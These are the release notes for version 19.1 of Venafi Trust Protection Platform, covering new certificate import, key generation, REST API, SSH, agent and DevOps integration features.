Venafi Trust Protection Platform version 19.1 introduces some significant enhancements across the product line, including remote and central key generation support.
IMPORTANT! Before upgrading to version 19.1, carefully review the topic "Important Considerations Before Upgrading to Venafi Platform 19.1".
TLS Server Certificate
Introducing Adaptable Certificate Import
Use the new Adaptable Certificate Import feature to import certificates automatically from Certificate Authorities (CA) or other certificate repositories, such as a database or network share. Author your own custom PowerShell scripts that import certificates from locations with compatible APIs. Use the included sample scripts that make it easy to import certificates from a folder or a DigiCert account according to a schedule.
See Configuring a certificate import using Adaptable CA.
Certificate and Device Placement jobs
Use this new job type in Aperture to organize and combine devices and certificates using a schedule. If you have certificates to import into your inventory that don't support automatic placement, you can create a Certificate and Device Placement job that automatically allows your system to regularly scan selected folders and move them to the correct team folders. (See Idea #36597892, #36355006)
See Certificate and Device Placement jobs.
Remote Key Generation support in Aperture
The Aperture Certificate Request wizard has been updated to support remote generation of private keys as part of the certificate request process. The wizard allows for the creation of a certificate installation at the time of a certificate request. After the wizard completes, a new option allows you to immediately start enrolling the certificate and installing it on the configured device.
Remote key generation support in Aperture also makes normal certificate installation significantly easier to configure for application administrators. (See Idea #36843895)
See Supported types of key generation and Creating a new certificate in Aperture
Onboard Discovery and Bulk Provisioning improvements
In previous versions, credentials and devices had to be created in WebAdmin before you created an Onboard Discovery or Bulk Provisioning job in Aperture. Now in version 19.1, you can provide a comma-separated list of hostnames or IP addresses and create your devices in bulk while also assigning the appropriate connection credential. (See Idea #36358504)
See Creating a new Onboard Discovery job and Creating a new Bulk Provisioning job.
Microsoft Certificate Authority Import Available in Aperture
You can now manage Microsoft CA Import jobs in Aperture; the redundant WebAdmin functionality will be deprecated in a future release. (See Idea #36621241)
See Configuring a certificate import from a Microsoft CA.
Domain Component support for certificates
The Domain Components (DC) feature is an advanced feature in Trust Protection Platform that enables support for parsing, inserting, applying policy, and filtering domain components in remotely and centrally generated CSRs. For example, you could use client authentication certificates to restrict the access of the certificate to the sub-domain specified on the certificate using the domain component attribute. (See Idea #36355963)
See About Domain Components.
CA drivers' "Call Back" logic
All CA drivers have been enhanced with new retrieval logic. When a certificate is not immediately available for the Venafi Platform to download, this new logic increases the checking interval gradually from 30 seconds to a maximum of 32 minutes. This allows the platform to be more responsive while simultaneously minimizing the impact on slower CA enrollment services.
Adaptable Workflow script change detection
Like other Adaptable features in 18.4, the Adaptable Workflow has been updated to protect against unapproved changes to your PowerShell scripts. Therefore, in version 19.1, PowerShell script changes must be approved using the Adaptable Workflow object before the changes are applied.
See Protecting against unapproved changes to Adaptable Workflow scripts.
Enrollment and Installation Drivers
Microsoft CA Redundancy
You can now configure a Microsoft CA Pool that allows you to specify two or three separate CA servers so that if the first is not available--for example, due to an outage--the Venafi Platform can still fulfill certificate requests by leveraging the secondary (or even a tertiary) server. (See Idea #36491767)
See Setting up redundancy using the Microsoft CA Pool template.
iPlanet Certificate Installation Driver
The iPlanet driver is now available for use in Aperture. The driver is also updated to support the SQLite key database format in addition to the default Berkeley format.
See Creating an Oracle iPlanet application object.
ECC Support for Automated Certificate Installations (Provisioning)
The Adaptable and PEM installation drivers can now provision elliptic-curve cryptography (ECC) certificates and private keys to applications and devices that support them. (See Idea #35871745)
REST API (Web SDK)
Swagger OpenAPI Specification
You can use the Swagger specification to generate API client code or to try individual REST API methods in a test environment. Swagger support is available for the following interfaces: authorize, certificates, discovery, identity, and SSH. You can access the Swagger web interface by visiting https://{TPP-FQDN}/vedsdk in a browser. (See Idea #36533713)
See Trying out the Web SDK in Swagger.
GET Certificates Can Include More Certificate Properties
In previous versions of the Venafi Platform, the GET Certificates method would return common name, SANs, validity information, SHA1 hash, and serial number. Now in version 19.1, as additional options, you can include the full subject, issuer, key algorithm, and key size for every certificate in the response.
See GET Certificates.
GET Certificates/{guid}/ValidationResults
Certificate SSL/TLS Validation Results can be retrieved through this new certificate API method. This method returns information similar to what is seen for a certificate on its SSL/TLS page in Aperture.
See GET Certificates/{guid}/ValidationResults.
POST Identity/SetPassword
You can now programmatically rotate the credentials for local Venafi identities using this new API method for setting local passwords. The caller must be a master administrator unless the caller is changing its own local account. (See Idea #36865630)
See POST Identity/SetPassword.
GET Permissions/Refresh
In past versions, a Web SDK integration would have to re-authenticate in order to see new objects that were created after establishing a session. Now, the new Refresh API method is available that refreshes permissions so the caller does not have to start a new session. A common case for this is a Web SDK integration that involves approving workflow tickets.
See GET Permissions/Refresh.
POST SSH/SkipKeyRotation
Use the new SkipKeyRotation method to tell the SSH Product to skip the rotation of a particular key. The method does this by marking that key as not requiring rotation.
See POST SSH/SkipKeyRotation.
Enterprise Mobility Protect Product
User and Client Device dashboard
The new User and Client Device dashboard in Aperture improves visibility into user and client device certificates. Administrators can see trends and current values for different metrics, which can help to detect potential outages and find non-compliant certificates.
See Working with the User and Client Device Certificate Dashboard.
New dashboard widget showing the origin of the certificates
As a component of the new User and Client Device dashboard, the Certificate Origin widget shows the total number of certificates requested by each Trust Protection Platform component (such as User Agent, User Portal, etc.), or by external solutions using Network Device Enrollment (SCEP).
See Certificate Origin widget.
New tile on Certificate Totals widget
A new tile is available on the Certificate Totals widget, also found on the new User and Client Device dashboard. The tile indicates the number of certificates in the renewal period that might require renewal.
See Client Certificate Totals Widget.
SSH Product
Duplicate host keys widget
The SSH dashboard has a new widget that shows duplicate host key risks for Network Discovery. The widget also adds this information to the Network Discovery report for reviewing SSH risks.
Autoskip key rotations
If devices are offline during key rotation, you can force rotation. You can also review a list of devices that are stuck in rotation.
See Forced rotation of SSH keys.
Log refactoring
The logging of SSH events has been stabilized and improved.
Certificate DevOps Integrations
VCert SDK for Python
Open source, Python language implementation of functionality first introduced by the VCert SDK for Go. Increases integration opportunities for technology partners and the DevOps community.
See GitHub - Venafi/vcert-python.
Retrieve Policy using VCert SDK
Update to the open source VCert SDK for Go that returns certificate issuance policy from Trust Protection Platform or Venafi Cloud in a standard, service-agnostic format.
See GetHub - Venafi/vcert.
HashiCorp Vault – Policy Control
Open source, Vault Plugin shows how Trust Protection Platform or Venafi Cloud policy can be used to constrain the composition of certificates issued by a HashiCorp Vault PKI CA.
See GitHub - Venafi/Vault-PKI-Monitor.
Ansible – certificate backend
Open source implementation of an Ansible role that uses VCert-Python to fulfill certificate requests through Trust Protection Platform or Venafi Cloud.
See GitHub - Venafi/Ansible-Role.
Server Agent
CAPI provisioning enhancements
For CAPI provisioning, allows you to set the trustee and exportability. (See Idea #36476773)
Stack protection
On Linux and Windows, memory stack protection improves security.
Proactive resource management
To reduce the footprint used by the Server Agent, a new proactive resource management feature has been introduced in version 19.1. This configurable feature monitors the memory usage of the Server Agent and proactively takes steps to reduce usage, including restarting the agent service.
Visual C Runtime dependency update
Server Agent on Windows is now built with Visual Studio 2017. Previous versions of the agent were built on Visual Studio 2013, where that Runtime version ends mainstream support from Microsoft on 2019-APR-09.
Update to OpenSSL 1.1.1
The OpenSSL component of Server Agent has been updated to version 1.1.1. Previous versions of the Server Agent were leveraging OpenSSL version 1.0.2, which is will no longer be supported after 2019-DEC-31.
Advanced Key Protect
Hardware Remote Key Generation in Aperture
The Apache, CAPI, and JKS drivers have additional fields to support remote key generation on an HSM. In Aperture, these drivers now operate in a similar manner as with WebAdmin. (See Idea #36358504)
See the following topics:
- Enabling remote key generation for Apache certificates
- Enabling remote key generation for CAPI certificates
- Enabling remote key generation for JKS certificates
Apache Thales/nCipher Unique Key Alias
When generating keys in Thales/nCipher HSMs, the Apache driver uses the date/timestamp to ensure key aliases are unique. This can make it easier to work with the keys in some Thales/nCipher key management utilities.
Comments